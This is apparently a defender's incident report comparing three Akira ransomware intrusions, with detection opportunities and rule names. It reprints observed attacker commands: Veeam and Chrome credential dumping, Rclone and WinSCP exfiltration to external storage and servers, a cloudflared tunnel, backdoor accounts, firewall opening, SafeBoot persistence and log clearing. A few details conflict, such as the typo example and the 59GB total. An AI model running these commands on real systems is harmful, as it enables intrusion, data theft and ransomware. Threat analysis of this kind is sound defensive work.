Three Akira Intrusions Compared

*Published: 4/14/2026* > **BLUF:** Three separate Akira-affiliated intrusions, each with a different initial access vector, different tooling, and different tempo - yet overlapping TTPs that reveal the common playbook underneath the affiliate variation. The fastest went from VPN login to ransomware detonation in under a day. The slowest exfiltrated 59GB before anyone picked up the phone. Comparing the three reveals which behaviors are structural to the Akira playbook and which are affiliate-specific - and where defenders should focus detection effort. ## Why Three Intrusions Matter Single intrusion write-ups show you what *one affiliate did once*. Comparing three intrusions against the same RaaS operation reveals what's structural versus what's incidental. When three different operators independently reach for Impacket WmiExec, that's a playbook, not a coincidence. When they diverge - one uses Rclone, another WinSCP, a third Wasabi - you learn the substitution boundaries that your detections need to survive. Akira (Storm-1567 / Howling Scorpius) is the #2 most prolific RaaS operation by volume in Q1 2026, behind only Qilin. Closed affiliate model, Conti lineage confirmed via blockchain analysis and shared code. $244M in cumulative ransom proceeds. No law enforcement disruption to date. These three intrusions were observed within the same managed environment. All identifying details have been sanitized. --- ## At a Glance | | Intrusion 1 | Intrusion 2 | Intrusion 3 | |---|---|---|---| | **Initial access** | Compromised MSP portal (Atera RMM) | RDP with stolen credentials | SSL VPN compromise | | **C2 / persistence** | Cloudflared tunnel + AnyDesk | WinSCP SFTP sessions | RDP via VPN + Impacket | | **Credential access** | Veeam PostgreSQL dump | Chrome cred theft (esentutl) | Chrome cred theft (esentutl) | | **Exfiltration** | SCP to ESXi host | WinSCP to external SFTP | N/A (went straight to encrypt) | | **Exfil tool** | Rclone (renamed `crowdstrike.exe`) + Wasabi Explorer | WinSCP | - | | **Impact** | Linux ransomware via SCP to ESXi | Data theft (no encryption observed) | Akira encryptor + Hyper-V VM shutdown | --- ## Intrusion 1 - Atera RMM Abuse → Cloudflared → Veeam → ESXi ### Initial Access **T1078 / T1133 - Valid Accounts + External Remote Services | Operator** The threat actor authenticated to the organization's Atera RMM portal using compromised MSP credentials. The login originated from a UK-based IP (`[attacker_ip_1]`), consistent with the MSP's geographic profile - making it blend with legitimate administrator activity. A subsequent login from an anomalous US-based IPv6 address confirmed this was not the MSP. The TA had portal-level access to every endpoint managed by the MSP. ``` Logged in from IP Address: [attacker_ip_1] | support@[redacted] | Login ``` > **Detection Opportunity:** Atera portal authentication lives in Atera's cloud audit logs, not endpoint telemetry. If your MSP uses Atera, forward their audit logs into your SIEM to get visibility on portal-level access. ### Execution via RMM **T1072 - Software Deployment Tools | Operator** With portal access, the TA spawned command prompts on managed endpoints via Atera's `AgentPackageRunCommandInteractive.exe` - a legitimate Atera binary designed for remote administration. ``` C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageRunCommandInteractive\ AgentPackageRunCommandInteractive.exe [session_token] agent-api.atera.com/Production 443 [...] ``` This is the parent process for everything that follows. Every malicious command in this intrusion spawned from this legitimate binary. > **Detection Opportunity:** Monitor for `AgentPackageRunCommandInteractive.exe` spawning reconnaissance or credential access tools (`net.exe`, `psql.exe`, `cloudflared.exe`). The binary is legitimate, so scope the detection to suspicious child processes rather than blocking the parent outright. ### Tunneling **T1572 - Protocol Tunneling | Operator** The TA installed Cloudflare Tunnel via MSI and established a persistent tunnel back to their infrastructure: ```python msiexec.exe /i "cloudflared.msi" /qn /log "C:\ProgramData\cloudflared_msi_install.log" cloudflared.exe tunnel run --token eyJhIjoiNjM2NWUy[...truncated...] ``` > **Detection Opportunity:** `cloudflared.exe tunnel run` with token argument. This was the first alert that surfaced this intrusion. > > See rule: [[edr-win-c2-reverse-tunneling]] ### Reconnaissance **T1087.002 / T1016 - Account Discovery + System Network Config | Operator** Standard domain enumeration, all spawning from the Atera agent: ```python net.exe group "domain admins" /dom net.exe user temp /dom # querying a specific account hostname nslookup ``` Note the typo - `net.exe use rtemp /dom` - the operator made a mistake and corrected it on the next command. This is a human at a keyboard, not automation. > **Detection Opportunity:** `net group "domain admins"` enumeration of privileged groups. > > See rule: [[edr-win-disc-net-priv-group-enum]] ### Account Manipulation **T1136.001 / T1098 - Create Account + Account Manipulation | Operator** The TA reactivated a dormant domain account (`temp`), set a new password, then created a fresh local account with admin rights: ```python net.exe user temp Passw0rd!12 /dom /active:yes net.exe user veean Passw0rd!12 /add net.exe localgroup administrators veean /add ``` The account name `veean` appears to be a deliberate misspelling of "Veeam" - the operator was creating a backdoor account named to blend with the backup infrastructure. > **Detection Opportunity:** `net user /add` followed by `localgroup administrators /add` - local account creation with immediate privilege escalation. ### Lateral Movement **T1021.001 - Remote Desktop Protocol | Operator** With the reactivated `temp` account, the TA RDP'd from the Veeam server to a domain controller: ```python mstsc /v:10.x.x.20 ``` Authentication events confirmed lateral movement: `4624 | Type 10 | 10.x.x.21 | temp` on the target. ### Persistence - AnyDesk **T1219 - Remote Access Software | Operator** AnyDesk was downloaded and installed as a backup remote access channel: ```python "C:\Users\temp\Downloads\AnyDesk.exe" --local-service "C:\Users\temp\Downloads\AnyDesk.exe" --local-control ``` > **Detection Opportunity:** AnyDesk installation and service registration on an endpoint where it is not an approved tool. > > See rule: [[edr-win-persist-rmm-deployment]] ### Credential Access - Veeam **T1555 - Credentials from Password Stores | Operator** The crown jewel of this intrusion. The TA opened the PostgreSQL config (`pg_hba.conf`) in Notepad - checking authentication settings - then dumped every credential stored in the Veeam Backup database: ```python NOTEPAD.EXE C:\Program Files\PostgreSQL\15\data\pg_hba.conf "C:\Program Files\PostgreSQL\15\bin\psql.exe" -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description, change_time_utc FROM credentials" ``` This command was executed **three times** via PowerShell ISE, suggesting the operator was iterating on the query or exfiltrating results between attempts. > **Detection Opportunity:** `psql.exe` querying `VeeamBackup` with credential-related SQL. Any `psql` or `sqlcmd` process touching the VeeamBackup credentials table is almost certainly malicious. > > See rule: [[edr-win-cred-veeam-db-access]] ### Exfiltration - Dual Method **T1048 - Exfiltration Over Alternative Protocol | Operator** **Method 1: Rclone renamed as `crowdstrike.exe`** The TA staged exfiltration tools in `C:\drives\brother\` - a custom staging directory: ```python Created | C:\drives\brother\start.vbs Created | C:\drives\brother\inc.txt Created | C:\drives\brother\rclone.conf Created | C:\drives\brother\crowdstrike.exe # renamed Rclone ``` The VBS script orchestrated Rclone (disguised as CrowdStrike) to exfiltrate backup data and QuickBooks databases to attacker-controlled cloud storage: ```python "C:\Windows\System32\cmd.exe" /c crowdstrike.exe copy --include-from inc.txt --max-age 700d "\\10.x.x.10\f$\BACKUP" backup:[cloud_bucket]/tdc/data_pst "C:\Windows\System32\cmd.exe" /c crowdstrike.exe copy "\\10.x.x.10\d$\QBD" backup:[cloud_bucket]/tdc/qbd ``` After exfiltration, the TA cleaned up - deleting `start.vbs`, `inc.txt`, and `rclone.conf`. The renamed Rclone binary (`crowdstrike.exe`) was subsequently deleted by the on-host AV. > **Detection Opportunity:** Rclone behavioral patterns regardless of binary name - detection is via PE metadata, not filename. The rename to `crowdstrike.exe` is a trivial evasion attempt that this detection survives. > > See rule: [[edr-win-exfil-rclone-usage]] **Method 2: Wasabi Cloud Explorer** Separately, the TA installed Wasabi Explorer for Cloud Storage and exfiltrated **~47 GB** across **~42,000 files** over a roughly 2-hour window of sustained data theft: ```python C:\Program Files\Wasabi\Wasabi Explorer for Cloud Storage\Wasabi Explorer for Cloud Storage.exe ``` The TA also browsed `F:\USERS\passwords.txt` and NinjaRMM agent configuration files via Notepad, harvesting additional credentials. After completing exfiltration, the TA uninstalled Wasabi and released the license - operational cleanup. > **Detection Opportunity:** Monitor for Wasabi Explorer installation followed by large outbound data transfer within a short window. A periodic hunt sweep is more practical than a real-time rule given the tool's legitimate use. ### Impact Preparation **T1098 / T1136.001 / T1562.004 / T1562.001 | Operator** The TA then executed an extensive defense evasion and persistence sequence to prepare the environment for ransomware deployment: **Account creation and privilege escalation:** ```python net.exe user BckAdmin [REDACTED] /add net.exe localgroup Administrators BckAdmin /add ``` **Firewall manipulation - opening all inbound ports:** ```python netsh.exe advfirewall firewall add rule name=Open_ALL dir=in action=allow protocol=TCP localport=ANY netsh.exe advfirewall firewall add rule name=Open_ALL dir=in action=allow protocol=UDP localport=ANY ``` **Service manipulation:** ```python net1 stop wuauserv sc config wuauserv start= disabled sc config gpsvc start=auto ``` **AnyDesk persistence across SafeBoot:** ```python reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDesk /ve /d Service /f reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDesk /v Service /t REG_DWORD /d 0 /f reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\gpsvc /ve /d Service /f ``` **Auto-logon configuration for the backdoor account:** ```python reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername /t REG_SZ /d BckAdmin /f reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d [REDACTED] /f ``` **SafeBoot with networking - the kill shot:** ```python bcdedit.exe /set {default} safeboot network bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures ``` This sequence is textbook Akira pre-encryption prep: configure SafeBoot with networking so AnyDesk survives the reboot, set auto-login so the TA maintains access, and force the system into SafeMode where most security products don't load. **Event log clearing:** ```python wevtutil.exe el # enumerate all logs wevtutil.exe cl "Application" # clear start wevtutil.exe cl "Windows PowerShell" # clear end wevtutil.exe cl "Microsoft-Windows-*" # nuclear option ``` > **Detection Opportunity:** Monitor for `bcdedit /set {default} safeboot network` outside of IT admin context - this is pre-encryption prep. Alert on firewall rules adding `Open_ALL` or allowing `ANY` on all ports. Watch for Winlogon auto-logon registry writes (`AutoAdminLogon`, `DefaultUsername`, `DefaultPassword`) combined with SafeBoot configuration. > > See rule(s): [[edr-win-impact-inhibit-recovery]] ### Impact - Linux Ransomware to ESXi **T1486 - Data Encrypted for Impact | Operator + Malware** The TA used SCP to transfer a Linux ransomware binary (`uk`) to the ESXi host: ```python scp uk [email protected]:/ ssh -l root -s -- 10.x.x.30 sftp ``` > **Detection Opportunity:** Monitor for `scp.exe` or `ssh.exe` on Windows endpoints connecting to known hypervisor IPs. SCP from a user workstation to an ESXi host is almost never legitimate. --- ## Intrusion 2 - RDP + WinRAR Staging + Impacket WmiExec ### Initial Access **T1078 - Valid Accounts | Operator** Direct RDP from an external IP, authenticating with a compromised domain admin account: ``` 4624 | type 10 | [attacker_ip_2] | DOMAIN\sysadmin Source machine: DESKTOP-[redacted] ``` The source hostname `DESKTOP-[redacted]` has the default Windows naming convention - likely a VPS or throwaway box. ### Account Activation **T1098 - Account Manipulation | Operator** Immediately after landing, the TA activated the built-in Administrator account: ```python net user administrator Password! net user administrator /active:yes ``` This was repeated on multiple hosts throughout the intrusion - the operator was enabling the local Administrator on every machine they touched. ### Data Staging - WinRAR **T1560.001 - Archive Collected Data | Operator** The TA installed WinRAR and began password-protected archiving of targeted file types from the D: drive: ```python WinRAR.exe a -m4 -v2g -tn365d -n*.bmp -n*.doc -n*.docx -n*.xls -n*.xlsx -n*.pdf -n*.txt -hpcompanypass "C:\ProgramData\data.rar" "D:\" ``` Flags decoded: - `-m4` - best compression - `-v2g` - split into 2GB volumes - `-tn365d` - only files modified within the last 365 days - `-n*.doc -n*.xlsx` etc. - target document types only - `-hpcompanypass` - encrypt archive with password "companypass" The operator ran this repeatedly, creating `data.rar`, `data2.rar`, `data3.rar`, through `data6.rar` - each targeting the same file types, suggesting they were archiving from different source paths or the operation was interrupted and restarted. > **Detection Opportunity:** Alert on WinRAR with the `-hp` (password) flag creating encrypted archives from network shares or large drive paths. The `-hp` flag specifically (vs `-p`) hides the file listing, making inspection impossible without the password. High-fidelity exfiltration staging indicator. ### Lateral Movement - Impacket WmiExec **T1047 - Windows Management Instrumentation | Operator** The TA pivoted to Impacket WmiExec for command execution on remote hosts. The telltale WmiExec output redirection pattern: ```python cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1684293517.4120836 2>&1 cmd.exe /Q /c tasklist | findstr chrome.exe 1> \\127.0.0.1\ADMIN$\__1684293517.4120836 2>&1 ``` The `\\127.0.0.1\ADMIN$\__<timestamp>` output file is Impacket's signature - it writes command output to a temporary file in the ADMIN$ share and reads it back. > **Detection Opportunity:** The `\\127.0.0.1\ADMIN$\__<timestamp>` output redirection pattern is Impacket's signature. This generated 16 cases in the operational queue. > > See rule: [[edr-win-lat-impacket-wmiexec]] ### Credential Theft - Browser Credentials **T1555.003 - Credentials from Web Browsers | Operator** The TA systematically killed browser processes, then used `esentutl.exe` to copy the Chrome credential database: ```python # Kill Chrome cmd.exe /Q /c tasklist | findstr chrome.exe cmd.exe /Q /c taskkill /IM chrome.exe /F powershell.exe -Enc [base64: Stop-Process chrome] # Kill Edge cmd.exe /Q /c tasklist | findstr msedge.exe cmd.exe /Q /c taskkill /IM msedge.exe /F powershell.exe -Enc [base64: Stop-Process msedge] # Copy Chrome credential database cmd.exe /Q /c esentutl.exe /y "C:\Users\[user]\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "...\Login Data.tmp" # Cleanup cmd.exe /Q /c del "...\Login Data.tmp" ``` The sequence is deliberate: kill the browser process (which holds a lock on the credential database), copy it via `esentutl` (the Extensible Storage Engine utility - a legitimate Windows tool), then delete the copy after presumably exfiltrating it. > **Detection Opportunity:** `esentutl.exe /y` targeting browser credential paths. This behavioral detection covers any browser, not just Chrome. > > See rule: [[edr-win-cred-browser-esentutl]] ### Exfiltration - WinSCP **T1048 - Exfiltration Over Alternative Protocol | Operator** The TA installed WinSCP and exfiltrated to two external SFTP servers: ```python "C:\ProgramData\WinSCP.exe" /console /command "open sftp://[exfil_user]@[exfil_server_1]:[port]" "C:\ProgramData\WinSCP.exe" /console /command "open sftp://[exfil_user]@[exfil_server_2]:[port]" ``` Notable operational pattern: the TA installed WinSCP, used it, **uninstalled it**, then **reinstalled it** later to resume exfiltration. This suggests operational security awareness - remove tools between sessions - though the telemetry captured both install cycles. The port was non-standard for SFTP (typically 22), and the exfiltration username was reused across both servers. ### Additional Reconnaissance ```python ping [FILESERVER1].[redacted] ping [FILESERVER2].[redacted] wmic process get /value ``` The ping targets suggest the TA was looking for additional file servers to exfiltrate from. The `wmic process get /value` dumps all running process details - mapping what security tools are running. > **Note:** No ransomware deployment was observed in this intrusion. The operator focused exclusively on data theft and credential harvesting. This is consistent with Akira's double extortion model - exfiltrate first, encrypt later (or not at all, if the victim pays for data deletion). --- ## Intrusion 3 - SSL VPN → Impacket → Ransomware ### Initial Access **T1078 / T1133 - Valid Accounts + External Remote Services | Operator** VPN access via a compromised service account - a third-party monitoring agent account repurposed as an attack vector: ``` 4624 | Type 3 | 10.x.x.50 | DOMAIN\[svc_account] ``` The SSL VPN assigned IP `10.x.x.50` to the attacker's session. Multiple Type 3 (network) authentications from this IP preceded the interactive session. ### Credential Reset via Impacket **T1098 - Account Manipulation | Operator** First action after VPN: reset the compromised account's password via Impacket WmiExec: ```python cmd.exe /Q /c net user [svc_account] [password] /dom 1> \\127.0.0.1\C$\Windows\Temp\wPmNdJ 2>&1 ``` > **Detection Opportunity:** The `\\127.0.0.1\` output redirection pattern is Impacket's signature and triggered immediately. > > See rule: [[edr-win-lat-impacket-wmiexec]] ### Defense Evasion - DisableRestrictedAdmin **T1112 - Modify Registry | Operator** The TA disabled Restricted Admin mode to enable pass-the-hash for RDP: ```python cmd.exe /Q /c powershell -command New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force 1> \Windows\Temp\fQxBtR 2>&1 ``` Setting `DisableRestrictedAdmin` to `0` enables Restricted Admin mode, which paradoxically allows RDP authentication using only NTLM hashes - no plaintext password needed. This is a well-known technique for pass-the-hash over RDP. > **Detection Opportunity:** Alert on `DisableRestrictedAdmin` registry modification via PowerShell or `reg.exe` outside of GPO deployment. Setting this value to `0` enables pass-the-hash over RDP - almost always malicious in a non-GPO context. ### EDR Removal Attempt **T1562.001 - Impair Defenses: Disable or Modify Tools | Operator** ```python "C:\Program Files\[EDR_VENDOR]\[EDR Agent]\uninstallgui.exe" ``` A direct attempt to uninstall the endpoint protection. Whether this succeeded depends on tamper protection configuration. ### Reconnaissance **T1018 / T1087 - Remote System Discovery + Account Discovery | Operator** ```python "C:\Users\[svc_account]\Downloads\netscan.exe" "C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe" "C:\Windows\system32\nltest.exe" /domain_trusts ``` PowerShell was used to enumerate AD computers and users, with results written to `C:\ProgramData\AdComp.txt` and `C:\ProgramData\AdUsers.txt`. The TA then viewed these files in Notepad - manual review of enumeration results. Advanced IP Scanner exported results to `C:\Users\[user]\Desktop\scan_results.html`, which the TA opened in Firefox - building a visual map of the network. > **Detection Opportunity:** `nltest /domain_trusts` and netscan.exe execution from user-writable paths. > > See rule(s): [[edr-win-disc-nltest-domain-trusts]] | [[edr-win-disc-netscan-deployment]] ### Credential Theft - Browser Credentials (Again) **T1555.003 - Credentials from Web Browsers | Operator** Same `esentutl` technique as Intrusion 2 - same operator playbook or shared documentation: ```python cmd.exe /Q /c esentutl.exe /y "C:\Users\[user]\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "...\Login Data.tmp" cmd.exe /Q /c del "...\Login Data.tmp" ``` > **Detection Opportunity:** Same `esentutl` browser credential theft technique as Intrusion 2. > > See rule: [[edr-win-cred-browser-esentutl]] ### Data Browsing **T1005 - Data from Local System | Operator** The TA browsed PII documents through Chrome and Firefox - specifically targeting W-9 forms and employee identification documents. This is high-value PII for extortion leverage. ### Lateral Movement - VPN IP Shift **T1021.001 - Remote Desktop Protocol | Operator** The VPN-assigned IP shifted from `.238` to `.239` and then to `.172` across the intrusion - the TA reconnected to the VPN multiple times, receiving new DHCP assignments each time. Authentication events trace the movement: ``` 4624 | Type 10 | 10.x.x.50 | DOMAIN\[svc_account] # initial 4624 | Type 10 | 10.x.x.51 | DOMAIN\[svc_account] # reconnect 4624 | Type 10 | 10.x.x.52 | DOMAIN\[svc_account] # later session ``` A failed authentication revealed the TA's source workstation: `[redacted]\vboxuser` - a VirtualBox VM. This is consistent with affiliate operational security practices. ``` 4625 | type 3 | 10.x.x.51 | [redacted]\vboxuser ``` ### Impact - Ransomware Deployment **T1486 - Data Encrypted for Impact | Operator + Malware** The encryptor was delivered via browser download and executed manually - 5 times: ```python "C:\Users\[svc_account]\Downloads\svcagent.exe" # executed 5x File Created | svcagent.exe | File size: 1.42 MB # dropped by Explorer.exe ``` The filename `svcagent.exe` (masquerading as a service agent) is a renamed Akira encryptor. The 5 executions suggest the operator was targeting different paths or the first attempts failed. ### Hyper-V VM Shutdown **T1529 - System Shutdown/Reboot | Operator** Before encryption could propagate to virtualized infrastructure, the TA shut down VMs via the Hyper-V management console: ```python mmc.exe "C:\Windows\system32\virtmgmt.msc" Hyper-V | Turn Off VM | VM-DB01 Hyper-V | Turn Off VM | VM-APP01 Hyper-V | Turn Off VM | VM-WEB01 Hyper-V | Turn Off VM | VM-DC01 ``` Shutting down VMs before encryption ensures the VMDK files are not locked by running processes - a known Akira technique for encrypting virtualized environments from the hypervisor host. ### Ransom Note ``` File Created | C:\akira_readme.txt | Size: ~2.7 KB ``` Behavioral ransomware protection triggered from `10.x.x.52` - the unprotected VPN endpoint serving as the encryption source. > **Detection Opportunity:** VSS deletion would be caught if it occurred. The Hyper-V shutdown via `virtmgmt.msc` and the `svcagent.exe` encryptor have no detection coverage. Behavioral ransomware protection caught the encryption activity from the network, but only after it started. > > See rule: [[edr-win-impact-inhibit-recovery]] --- ## Cross-Intrusion Analysis ### What's Structural (Playbook) These behaviors appeared across multiple intrusions, suggesting they're part of the Akira affiliate playbook rather than individual operator preference: | Behavior | I1 | I2 | I3 | Playbook? | |---|:---:|:---:|:---:|---| | Impacket WmiExec | - | ✓ | ✓ | Yes - primary remote execution tool | | `esentutl` for Chrome creds | - | ✓ | ✓ | Yes - shared credential theft technique | | `net user /active:yes` | ✓ | ✓ | ✓ | Yes - account activation on every intrusion | | WinRAR for staging | - | ✓ | - | Partial - seen in I2 and general Akira reporting | | Reconnaissance before action | ✓ | ✓ | ✓ | Yes - domain admins, netscan, IP scanning in all three | | AnyDesk deployment | ✓ | - | - | Partial - seen in I1, but AnyDesk is common across RaaS | ### What's Affiliate-Specific (Variation) | Dimension | Intrusion 1 | Intrusion 2 | Intrusion 3 | |---|---|---|---| | Initial access | MSP compromise (Atera) | Stolen RDP creds | VPN account (SSL) | | Exfil tool | Rclone + Wasabi | WinSCP | None observed | | Encryption target | ESXi (Linux variant) | None (data theft only) | Windows (Hyper-V VMs) | | Operator tempo | Multi-day | Multi-day with gaps | Single session | | OPSEC level | Moderate (tool cleanup) | High (install/uninstall cycle) | Low (default passwords) | ### Operator Tradecraft Tells **Intrusion 1** - The most sophisticated operator. MSP-level access, Cloudflare tunneling, renamed Rclone, dual exfiltration methods, and Linux ransomware targeting ESXi directly. The SafeBoot + AnyDesk persistence chain is an advanced technique. **Intrusion 2** - The most patient operator. Methodical data staging with WinRAR, install/uninstall cycles for WinSCP, and no ransomware deployment - pure data theft. The password "companypass" on the WinRAR archives suggests either laziness or an expectation that the archives would never be intercepted. **Intrusion 3** - The least sophisticated. Default-style passwords, failed authentication revealing a VirtualBox VM (`[redacted]\vboxuser`), and brute-force execution (running the encryptor 5 times). The `DisableRestrictedAdmin` technique shows some knowledge, but the overall execution was noisy. --- ## Detection Coverage Summary ### Detections | Rule | Intrusion | Phase | | ------------------------------------- | --------- | --------------------- | | [[edr-win-c2-reverse-tunneling]] | I1 | C2 (cloudflared) | | [[edr-win-disc-net-priv-group-enum]] | I1 | Reconnaissance | | [[edr-win-cred-veeam-db-access]] | I1 | Credential access | | [[edr-win-persist-rmm-deployment]] | I1 | Persistence (AnyDesk) | | [[edr-win-lat-impacket-wmiexec]] | I2, I3 | Lateral movement | | [[edr-win-cred-browser-esentutl]] | I2, I3 | Credential access | | [[edr-win-exfil-rclone-usage]] | I1 | Exfiltration | | [[edr-win-disc-nltest-domain-trusts]] | I3 | Reconnaissance | | [[edr-win-disc-netscan-deployment]] | I3 | Reconnaissance | | [[edr-win-impact-inhibit-recovery]] | I1, I3 | Impact | --- ## References - [CISA/FBI - #StopRansomware: Akira Ransomware (AA24-109A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) - [Arctic Wolf - Conti and Akira: Chained Together](https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/) - [Sophos - Akira, Again: The Ransomware That Keeps on Taking](https://www.sophos.com/en-us/blog/akira-again-the-ransomware-that-keeps-on-taking) - [Unit 42/Palo Alto - Howling Scorpius Threat Assessment](https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/) - [Halcyon - Akira Ransomware Attacks in Under an Hour](https://www.halcyon.ai/ransomware-research-reports/akira-ransomware-attacks-in-under-an-hour)